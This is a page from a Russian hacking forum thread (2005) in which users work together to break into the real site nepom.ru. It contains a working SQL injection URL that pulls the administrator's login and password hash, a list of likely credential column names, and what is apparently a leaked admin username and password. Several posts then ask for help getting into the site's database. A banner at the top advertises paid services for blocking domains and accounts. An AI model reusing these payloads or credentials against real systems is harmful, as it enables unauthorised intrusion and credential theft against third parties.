Форум АНТИЧАТ - Sql иньекция в nepom.ru

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Sql иньекция в nepom.ru

Страница 2 из 2

Опции темы

Поиск в этой теме

Опции просмотра

#11

06.10.2005, 11:05

Thief

Познающий

Регистрация: 03.08.2004

Сообщений: 52

Провел на форуме:
68289

Репутация: 2

http://nepom.ru/interest/?raz=1%27
http://nepom.ru/users/?login=%27
Не выходит выполнить запрос. Что-то быстро они багу та увидали надеюсь всё мирно будет

#12

06.10.2005, 12:22

virgoz

Участник форума

Регистрация: 16.09.2004

Сообщений: 193

Провел на форуме:
621131

Репутация: 47

Отправить сообщение для virgoz с помощью ICQ

Продолжение следует

http://nepom.ru/story/text.php?id=-1'+UNION+SELECT+1,2,3,login,passwd,6,7,8,9,10,11 FROM+users+where+login='ChatAdmin'/*

#13

07.10.2005, 07:38

Thief

Познающий

Регистрация: 03.08.2004

Сообщений: 52

Провел на форуме:
68289

Репутация: 2

virgoz -- благодарю только вот у меня вопрос как ты догадался что там есть login,passwd ............ Крутая иньекция получилась

#14

07.10.2005, 14:28

virgoz

Участник форума

Регистрация: 16.09.2004

Сообщений: 193

Провел на форуме:
621131

Репутация: 47

login, passwd, uname, username, user, pass, password, pas - самые распостраненные имена для столбцов c паролями и логинами.

#15

10.10.2005, 13:18

Thief

Познающий

Регистрация: 03.08.2004

Сообщений: 52

Провел на форуме:
68289

Репутация: 2

Вот на досуге полазал нашол следующее
Administrator
ytnvtyz
Вообщем не без вашей помощи удалось добыть далее захожу и нахожу бд my sql... Вот только почемута не получается войти пароль может иной или доступ только по IP можете взглянуть может у вас чтонибуть выйдет........

#16

10.10.2005, 14:44

Deniska

Познающий

Регистрация: 27.07.2005

Сообщений: 37

Провел на форуме:
529377

Репутация: 5

Отправить сообщение для Deniska с помощью ICQ

Та же беда
Не пускает.

#17

11.10.2005, 07:15

Thief

Познающий

Регистрация: 03.08.2004

Сообщений: 52

Провел на форуме:
68289

Репутация: 2

Ну жаль скорее всего идёт проверка по Ip потому и не пускает мне в принципе прав админа хватает...

#18

06.11.2005, 11:09

Thief

Познающий

Регистрация: 03.08.2004

Сообщений: 52

Провел на форуме:
68289

Репутация: 2

Здраствуйте снова был такой ресурс nepom.ru потом временно его не стало но сейчас он появился снова но пропатчиный но со старой дыркой http://nepom.ru/interest/?raz='
Иньекцию не получается сделать никак, нет таких мозгов как virgoz[B] Помогите...

#19

07.11.2005, 16:22

Deem3n®

Постоянный

Регистрация: 19.09.2005

Сообщений: 408

Провел на форуме:
3730496

Репутация: 519

http://nepom.ru/interest/?raz='
Запрос SELECT `id` FROM `int` WHERE `raz`=''' не выполнен

выбор идет только по одному INTEGER полю

Страница 2 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая	k00p3r	Чужие Статьи	1	12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход